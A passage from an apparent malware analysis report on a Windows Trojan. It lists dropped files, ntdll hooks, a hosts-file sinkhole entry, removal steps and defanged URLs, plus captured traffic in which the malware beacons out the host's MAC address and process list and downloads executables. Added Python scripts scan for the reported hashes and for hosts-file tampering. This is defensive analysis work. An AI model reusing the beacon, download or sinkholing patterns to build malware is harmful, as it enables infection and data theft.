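def parse_dropped_table(text):
    """Map MD5 -> reported path from a 'MD5 | File path |' table.

    Header, separator and malformed rows are skipped.
    """
    iocs = {}
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 2 or len(cells[0]) != 32:
            continue
        try:
            int(cells[0], 16)
        except ValueError:
            continue
        iocs[cells[0].lower()] = cells[1]
    return iocs


def file_digests(path, chunk=1 << 20):
    """Return (md5, sha256) of a file, hashed in chunks so large files are fine.

    MD5 is what the report provides; SHA-256 is recorded alongside each hit
    because MD5 is collision-prone and a stronger hash is needed for sharing.
    """
    md5, sha = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            md5.update(block)
            sha.update(block)
    return md5.hexdigest(), sha.hexdigest()


def scan_tree(root, iocs):
    """Walk root and return [(found_path, md5, sha256, reported_path)] for hits."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                md5, sha = file_digests(full)
            except OSError:
                continue  # locked or unreadable: skip, do not abort the sweep
            if md5 in iocs:
                hits.append((full, md5, sha, iocs[md5]))
    return hits


def demo():
    """Self-contained run: plant a constructed file under a temp tree, add its
    hash to the IOC set beside the report's rows, and scan for it."""
    with tempfile.TemporaryDirectory() as root:
        planted = os.path.join(root, "Temp", "renamed_copy.exe")
        os.makedirs(os.path.dirname(planted))
        with open(planted, "wb") as fh:
            fh.write(b"MZ constructed sample body, not a real dropper\n")
        with open(os.path.join(root, "clean.txt"), "w") as fh:
            fh.write("nothing to see here\n")
        iocs = parse_dropped_table(DROPPED_PE_TABLE)
        iocs[file_digests(planted)[0]] = "c:\\constructed\\example.exe"  # constructed entry
        return [(os.path.relpath(h[0], root), h[3]) for h in scan_tree(root, iocs)]


if __name__ == "__main__":
    for found, reported in demo():
        print("%s matches dropped file %s" % (found, reported))
```

On a real host the script would be pointed at the drive root (or at the %Temp%, %AppData% and %System% paths in the table) with the full table pasted into DROPPED_PE_TABLE; because matching is on content, the copy in Temporary Internet Files and the copy on disk are both reported.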
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which maps host names to IP addresses and takes precedence over DNS. The modified file is 734 bytes in size. The following entry is added:
IP address | Host name |
---|---|
127.0.0.1 | ZieF.pl |
Pointing a domain at the loopback address sinkholes it for every program on the machine; malware commonly uses this to block security vendors' update and download sites or a competitor's servers.
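The hosts modification above is the kind of change that is cheap to check for on any suspect machine. The following Python checker is an added example, not part of the Lavasoft report: it parses a hosts file the way the resolver does (comments stripped, several names per line allowed) and flags names other than localhost-style names that are pointed at a loopback or unspecified address, plus any name on a caller-supplied watch list that has been overridden at all. The sample hosts content is constructed; it contains the "127.0.0.1 ZieF.pl" line from the report plus two invented lines (the example-av.test and example-bank.test names are placeholders) to show the other two cases.

```python
import ipaddress

# Constructed sample: a hosts file as it might look after the modification
# reported above, with the stock Microsoft header lines, the entry from the
# report, and two further tampering styles that are invented for this example.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
127.0.0.1 ZieF.pl
0.0.0.0   update.example-av.test   # constructed: blocking an updater
203.0.113.7 www.example-bank.test  # constructed: redirect to attacker host
"""

# Names that legitimately resolve to the loopback address.
ALLOWED_LOOPBACK = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every mapping in a hosts file.

    Comments and blank lines are skipped; one line may map several names
    to the same address, as the resolver allows.
    """
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue  # malformed line with no host name
        ip, names = fields[0], fields[1:]
        for name in names:
            yield ip, name.lower(), line_no


def find_hosts_anomalies(text, watch_domains=()):
    """Return [(line_no, ip, hostname, reason)] for suspicious entries.

    Flagged:
      * any name outside ALLOWED_LOOPBACK that maps to a loopback or the
        unspecified address (sinkholing, as in "127.0.0.1 ZieF.pl");
      * any name in watch_domains, or under one of them, mapped to any
        address at all, since a hosts entry silently overrides DNS;
      * lines whose address field is not a valid IP address.
    """
    watch = {d.lower() for d in watch_domains}
    findings = []
    for ip, name, line_no in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((line_no, ip, name, "invalid address"))
            continue
        if name in ALLOWED_LOOPBACK:
            continue
        if addr.is_loopback or addr.is_unspecified:
            findings.append((line_no, ip, name, "sinkholed to local address"))
        elif name in watch or any(name.endswith("." + d) for d in watch):
            findings.append((line_no, ip, name, "watched domain overridden"))
    return findings


if __name__ == "__main__":
    for finding in find_hosts_anomalies(SAMPLE_HOSTS, ["example-bank.test"]):
        print("line %d: %s -> %s (%s)" % finding)
```

On a Windows host the text would be read from %SystemRoot%\system32\drivers\etc\hosts; the watch list is the place to put the domains whose redirection would matter most in your environment (security vendors, banks, internal update servers).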
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile
These are user-mode (inline) hooks placed in a process's copy of ntdll.dll, not kernel hooks. Hooking the file-open, file-creation and process-creation entry points lets the injected code see and filter every file and process the hooked process creates or queries, which is how files and processes are hidden from, or intercepted in, that process. Hooks of this kind are visible to user-mode anti-rootkit tools that compare the in-memory prologue of each ntdll.dll export against the on-disk copy, which is why the manual removal steps below start with an anti-rootkit scan.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate the malicious process(es) with the Task Manager:
i.exe:1172
tqrl_90_4090.exe:1308
ws.exe:892
ignite.exe:428
ignite.exe:424
xtsszs_qn2.exe:540
SS540.exe:1688
%original file name%.exe:1660
xtsszs.exe:1484
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0\DL.exe (3944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\BindPlugIn[1].ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\DL[1].exe (6242 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\034Óê ÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÖÃÂÇï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\toolbar_hover (3).png (531 bytes)
%Documents and Settings%\%current user%\Application Data\mmt.ico (881 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ùï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\032Óê-áÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\huangli.xml (12024 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\´º½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\026Ñ©-´óÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\039Óê ±©Óêת´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\½Ìʦ½Ú.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Æßæ½Ú.png (930 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-Ò¹¼ä¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\023Ñ©-áѩתÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\052³¾ ɳ³¾±©.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-Ò¹¼äÕóÓê .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\input.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂû·ÑÕß.png (706 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Àö¯½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\setting.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\027Ñ©-´óѩת±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹úÇì½Ú.png (508 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_hover.png (680 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\³ýæ.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\manual.exe (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-Ò¹¼äÇç.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tip.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\024Ñ©-ÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\053³¾ ³¬É³³¾±©.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\047ÒõÌì.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾-ÃÂÂ.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\022Ñ©-áѩ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-Ò¹¼äÕóÑ© .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_yes.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\723¼ÃÂÄî.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\yi.png (998 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\046Óê Óê¼ÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ËÎç½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Templates\16201410\YYM_955WD30.gif (930 bytes)
%Documents and Settings%\%current user%\Desktop\天启日历.lnk (909 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ê¥µ®½Ú.png (873 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace64.dll (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸ß¿¼.png (555 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace.dll (3312 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\028Ñ©-±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\天启日历\天启日历.lnk (921 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\set.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB5.tmp (138023 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\043Óê ¶³Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe (11048 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\time.dll (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_state5.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\044Óê À×ÕóÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\035Óê ÖÃÂÓêת´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\tjapis[1].htm (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\NewIcons007.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3b.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\041Óê ´ó±©Óêת³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÞÈ˽Ú.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÛÀ¼½Ú.png (913 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\Weather_none.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-°×ÌìÕóÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\036Óê ´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Math.dll (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇåÃ÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\city.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¾Å®½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¸Ç×½Ú.png (846 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3a.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\kindness.exe (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\tclock.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\025Ñ©-ÖÃÂѩת´óÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ĸÇ×½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\045Óê À×ÕóÓê¼ÓÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹â¹÷½Ú.png (536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_normal.png (713 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ji.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÈÕÀú1.png (7192 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uTray.exe (5064 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.mdb (12536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂÂÃâ€ÃƒÂ¶Ã‚±Â¸ÃÂü.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\tj.html (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-°×Ìì¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Desktop\.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\054ÃŽÃÂ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_no.png (450 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\033Óê áÓêתÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇéÈ˽Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\051³¾ Ñïɳ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ddd.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-°×ÌìÕóÓê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\037Óê ´óÓêת±©Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\042Óê ³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-°×ÌìÇç.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_pushed.png (663 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\weathers.exe (38103 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ãâ€Ã‚ªÃÂü½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸Ã¶÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (20 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\038Óê ±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ƽ°²Ò¹.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.ldb (64 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\040Óê ´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\天启日历\配置\Uninstall.lnk (922 bytes)
%System%\dm.dll (3902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SkinH_EL.dll (88 bytes)
%System%\regsvr32.exe (300 bytes)
%System%\svhost.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SS540.exe (5873 bytes)
%Program Files%\sszs\uninst.exe (3082 bytes)
%Program Files%\sszs\xtsszsup.exe (8421 bytes)
%Program Files%\sszs\xtsszs.exe (7861 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\系统瘦身助手.lnk (650 bytes)
%Program Files%\sszs\xtsszs.dll (1568 bytes)
%Program Files%\sszs\mscomctl.ocx (21984 bytes)
%Documents and Settings%\%current user%\Desktop\系统瘦身助手.lnk (638 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\卸载系统瘦身助手.lnk (479 bytes)
%System%\diactss.dll (40 bytes)
%System%\netsh.exe (692 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\i.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe (17629 bytes)
C:\lpk.dll (601 bytes)
C:\RCXBA.tmp (16516 bytes)
%System%\hra33.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\onlinefirst[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xtsszs_qn2.exe (3915 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ws.exe (897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[1].txt (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\ws[1].exe (13382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\tqrl_90_4090[1].exe (601850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\17048312[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\xtsszs_qn2[1].exe (138776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\icon_7[1].gif (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\y[1].txt (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[2].txt (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\tj[1].htm (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tqrl_90_4090.exe (20507 bytes)
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
SEC | 4096 | 3608 | 1536 | 3.61819 | 5dd434da7f8bb065242d5c89668ae5e7 |
.rsrc | 8192 | 2492226 | 2492226 | 5.4455 | 5a73a37fddcd1df11e88c5db8f120526 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://zw.cn170.com/tj.html | 58.221.60.133 |
hxxp://zw.cn170.com/y.txt?6537536855 | 58.221.60.133 |
hxxp://js.users.51.la/17048312.js | 113.107.42.34 |
hxxp://c06.i06.arnic.hadns.net/6/tqrl_90_4090.exe | |
hxxp://c06.i06.arnic.hadns.net/0815/help1.html | |
hxxp://www.meimotuan.com/ico.ico | 114.215.202.132 |
hxxp://icon.ajiang.net/icon_7.gif | 125.46.49.200 |
hxxp://dx5.3525.com/tjapis.php?mac=000C29EC7FC5&st=1&exez=tqrl_90_4090.exe&exef=DL.exe&pass=e4df6e48b09cbba7c493c1139b8aca47&url1=hxxp://ya.ru/&url2=hxxp://dasf.cn/ | |
hxxp://xtsszs.oss-cn-hangzhou.aliyuncs.com/xtsszs_qn2.exe | 42.120.230.9 |
hxxp://down.gtm.ucweb.com/pcbrowser/down.php?pid=4299 | |
hxxp://www.xxdtec.com/winapp/manager/install.php?login=spoolsv.exe explorer.exe mscorsvw.exe jqs.exe alg.exe disablejavawarnsec.exe vmtoolsd.exe vmtoolsd.exe wmiprvse.exe sandbox_svc.exe cmd.exe tshark.exe cmd.exe procmon.exe cf273346271357355270352363270250366372v5.6.exe i.exe dl.exe ignite.exe mankind.exe netsh.exe netsh.exe xtsszs.exe wmiprvse.exe (Sum:35)Windows XP Service Pack 3[5.1.2600](32)(XP1)&mac=000C29EC7FC5&user=xtsszs_qn2.&ver=1.11 | 118.192.75.167 |
hxxp://zw.cn170.com/ws.exe | 58.221.60.133 |
hxxp://www.xxdtec.com/winapp/manager/onlinefirst.php?user=xtsszs_qn2.&mac=000C29EC7FC5 | 118.192.75.167 |
hxxp://union.yoyolm.net/tjapis.php?mac=000C29EC7FC5&st=1&exez=tqrl_90_4090.exe&exef=DL.exe&pass=e4df6e48b09cbba7c493c1139b8aca47&url1=hxxp://ya.ru/&url2=hxxp://dasf.cn/ | 222.186.130.92 |
hxxp://down.tianyunxj.com/6/tqrl_90_4090.exe | 116.11.254.249 |
hxxp://www.xxdtec.com/winapp/manager/install.php?login=spoolsv.exe explorer.exe mscorsvw.exe jqs.exe alg.exe disablejavawarnsec.exe vmtoolsd.exe vmtoolsd.exe wmiprvse.exe sandbox_svc.exe cmd.exe tshark.exe cmd.exe procmon.exe cf............v5.6.exe i.exe dl.exe ignite.exe mankind.exe netsh.exe netsh.exe xtsszs.exe wmiprvse.exe (Sum:35)Windows XP Service Pack 3[5.1.2600](32)(XP1)&mac=000C29EC7FC5&user=xtsszs_qn2.&ver=1.11 | 118.192.75.167 |
hxxp://update.yoyolm.net/0815/help1.html | 116.11.254.249 |
hxxp://down2.uc.cn/pcbrowser/down.php?pid=4299 | 211.103.82.247 |
hxxp://uu.cn170.com/y.txt?6537536855 | |
hxxp://uu.cn170.com/ws.exe | |
web.51.la | 117.21.226.40 |
chinaljndk.3322.org | 58.221.60.133 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /icon_7.gif HTTP/1.1
Accept: */*
Referer: hXXp://zw.cn170.com/tj.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icon.ajiang.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=14400
Content-Length: 922
Content-Type: image/gif
Last-Modified: Fri, 26 May 2006 14:27:28 GMT
Accept-Ranges: bytes
ETag: "088d583d080c61:1496"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:53 GMT
Connection: close
GET /17048312.js HTTP/1.1
Accept: */*
Referer: hXXp://zw.cn170.com/tj.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1980
Content-Type: application/x-javascript
Last-Modified: Wed, 16 Jul 2014 03:29:10 GMT
Accept-Ranges: bytes
ETag: "2ce8d71ba6a0cf1:197d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:18 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?17048312" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="hXXp://icon.ajiang.net/icon_7.gif" style="border:none" /></a>\n');..var a8312tf="51la";var a8312pu="";var a8312pf="51la";var a8312su=window.location;var a8312sf=document.referrer;var a8312of="";var a8312op="";var a8312ops=1;var a8312ot=1;var a8312d=new Date();var a8312color="";if (navigator.appName=="Netscape"){a8312color=screen.pixelDepth;} else {a8312color=screen.colorDepth;}..try{a8312tf=top.document.referrer;}catch(e){}..try{a8312pu =window.parent.location;}catch(e){}..try{a8312pf=window.parent.document.referrer;}catch(e){}..try{a8312ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a8312ops=(a8312ops==null)?1: (parseInt(unescape((a8312ops)[2])) 1);var a8312oe =new Date();a8312oe.setTime(a8312oe.getTime() 60*60*1000);document.cookie="AJSTAT_ok_pages=" a8312ops ";path=/;expires=" a8312oe.toGMTString();a8312ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a8312ot==null){a8312ot=1;}else{a8312ot=parseInt(unescape((a8312ot)[2])); a8312ot=(a8312ops==1)?(a8312ot 1):(a8312ot);}a8312oe.setTime(a8312oe.getTime() 365*24*60*60*1000);document.cookie="AJSTAT_ok_times=" a8312ot ";path=/;expires=" a8312oe.toGMTString();}catch(e){}..try{if(document.cookie==""){a8312ops=-1;a8312ot=-1;}}catch(e){}..a8312of=a8312sf;if(a8312pf!=="51la
<<< skipped >>>
GET /ico.ico HTTP/1.0
Host: VVV.meimotuan.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:52 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 18 Jun 2014 06:03:51 GMT
ETag: "e8901-25be-4fc16063d5483"
Accept-Ranges: bytes
Content-Length: 9662
Connection: close
Content-Type: image/vnd.microsoft.icon
GET /winapp/manager/install.php?login=spoolsv.exe explorer.exe mscorsvw.exe jqs.exe alg.exe disablejavawarnsec.exe vmtoolsd.exe vmtoolsd.exe wmiprvse.exe sandbox_svc.exe cmd.exe tshark.exe cmd.exe procmon.exe cf............v5.6.exe i.exe dl.exe ignite.exe mankind.exe netsh.exe netsh.exe xtsszs.exe wmiprvse.exe (Sum:35)Windows XP Service Pack 3[5.1.2600](32)(XP1)&mac=000C29EC7FC5&user=xtsszs_qn2.&ver=1.11 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
